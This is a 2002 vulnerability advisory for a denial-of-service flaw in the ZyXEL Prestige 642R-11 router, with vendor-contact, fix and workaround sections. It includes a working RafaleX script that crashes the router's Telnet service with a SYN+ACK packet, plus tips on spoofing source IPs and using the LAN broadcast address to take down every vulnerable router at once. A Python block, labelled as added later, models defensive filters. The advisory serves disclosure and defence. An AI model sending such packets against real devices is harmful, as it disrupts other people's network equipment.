
ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS

by Nikola Strahija on June 17th, 2002 ZyXEL Prestige 642R-11 AJ.6 has a problem handling specially crafted packets. It is possible to send a packet that makes the router's services unavailable (Telnet and FTP; the DHCP service was not tested). Network traffic itself is not stopped. Possibly more ZyNOS-based routers are vulnerable. Please reply if you find any other ZyNOS-based router vulnerable.


Details
-------
A ZyXEL 642R-11 router service can be crashed by sending a packet
with the TCP flags ACK and SYN set at the same time.
The service will then not be available even through RS-232.
Using a SYN-FIN packet makes the service port inaccessible for a
few minutes.

Affected services on ZyXEL 642R-11 are: TELNET, FTP and DHCP (if
enabled). TELNET and FTP cannot be deactivated.

Bypassing packet filter rules:
The source IP can also be spoofed. This allows an attacker to "bypass"
a filter that blocks specific IPs.
As target address you can also use the WAN address from the LAN side (see
BID 3346: http://online.securityfocus.com/bid/3346) if the router's
packet filter blocks its local address as target.
The DoS also works using the broadcast address of the LAN.
This means that all ZyXEL routers in the LAN that are vulnerable
to this attack can be crashed by sending one single packet.

Exploit
-------

# This is a RafaleX script (Download: www.packx.net)
# Rafale X script
# ---------------
# Action : Make a ZyXEL 642R Prestige Router inaccessible on port 23
#
%name=ZyXEL telnet service DoS
%category=Denial of service
%date=23-05-2002
%rafalemin=0.2
%description=Crash ZyXEL router telnet service with ACK and SYN flag

// Variables
$done=Target attacked...

// Do the stuff...
!Display=Please wait...
!Sleep 500
PORTDST=23
IPHEADERSIZE=20
ACK=1
SYN=1
!Display=Sending the packet...
!SEND 1 TCP
!Sleep 200
!Display=ACK/SYN Packet sent! ZyXEL telnet service crashed (V2.50(AJ.6))

!Sleep 1000

!Display=$done

Fix
---
Not yet available (17.6.2002). The vendor was contacted on 1.6.2002.

Workaround
----------
- on the WAN device, block these packets:
  - all packets coming from the WAN to ports 21, 23 and 67
    (source: 0.0.0.0 -> target: 0.0.0.0, applied on the input filter of the WAN
    device)
- on the LAN device, block these packets to ports 21, 23 and 67:
  - WAN IP of the router as target IP (why?
    http://online.securityfocus.com/bid/3346)
  - LAN address of the router as target IP
  - broadcast address as target IP.. ;)
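As an added illustration that is not part of the original advisory, the following Python models the two workaround filters above together with a stateless check for the SYN+ACK and SYN+FIN combinations the Details section describes. The router and LAN addresses (192.168.1.0/24, 203.0.113.5) and the sample_tcp fixture are assumptions of this example, not values from the advisory.

```python
import struct
from ipaddress import IPv4Address, IPv4Network

# Constructed addressing for this example; the advisory names no addresses.
ROUTER_LAN_IP = IPv4Address("192.168.1.1")
ROUTER_WAN_IP = IPv4Address("203.0.113.5")
LAN_NET = IPv4Network("192.168.1.0/24")
BLOCKED_PORTS = {21, 23, 67}  # TELNET, FTP, DHCP, as listed in the advisory
TCP = 6
FIN, SYN, ACK = 0x01, 0x02, 0x10

def parse_ipv4(pkt: bytes):
    """Return (proto, src, dst, dport, tcp_flags) from a raw IPv4 datagram."""
    ihl = (pkt[0] & 0x0F) * 4
    proto = pkt[9]
    src, dst = IPv4Address(pkt[12:16]), IPv4Address(pkt[16:20])
    # TCP and UDP both carry the destination port at transport offset 2
    dport = struct.unpack("!H", pkt[ihl + 2:ihl + 4])[0]
    flags = pkt[ihl + 13] if proto == TCP else 0
    return proto, src, dst, dport, flags

def flag_anomaly(flags: int):
    """Name the flag combination the advisory describes, or None."""
    if flags & SYN and flags & FIN:
        return "SYN+FIN"   # never valid in a normal handshake
    if flags & SYN and flags & ACK:
        return "SYN+ACK"   # unsolicited when it arrives at a listening port
    return None

def workaround_verdict(iface: str, pkt: bytes) -> str:
    """Apply the advisory's two input filters; iface is 'wan' or 'lan'."""
    _, _, dst, dport, _ = parse_ipv4(pkt)
    if dport not in BLOCKED_PORTS:
        return "allow"
    if iface == "wan":
        return "drop"  # WAN input: any source, any target, to 21/23/67
    # LAN input: router WAN IP, router LAN IP or LAN broadcast as target
    if dst in (ROUTER_WAN_IP, ROUTER_LAN_IP, LAN_NET.broadcast_address):
        return "drop"
    return "allow"

def sample_tcp(src: str, dst: str, dport: int, flags: int) -> bytes:
    """Constructed IPv4+TCP header pair (zero checksums) used as test input."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, TCP, 0,
                     IPv4Address(src).packed, IPv4Address(dst).packed)
    tcp = struct.pack("!HHIIBBHHH", 40000, dport, 0, 0, 0x50, flags, 8192, 0, 0)
    return ip + tcp
```

Run the same verdict function over a capture from each interface to confirm the filter drops exactly the cases the advisory lists and nothing else.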

Regards,
Ueli Kistler
[email protected] / [email protected]
www.packx.net / www.eclipse.fr.fm (IDScenter 1.09 beta 2 is soon out)

Greets to PacKX Team (RafaleX packet builder for Win2K/XP)


Key-ID: 0x7265F449
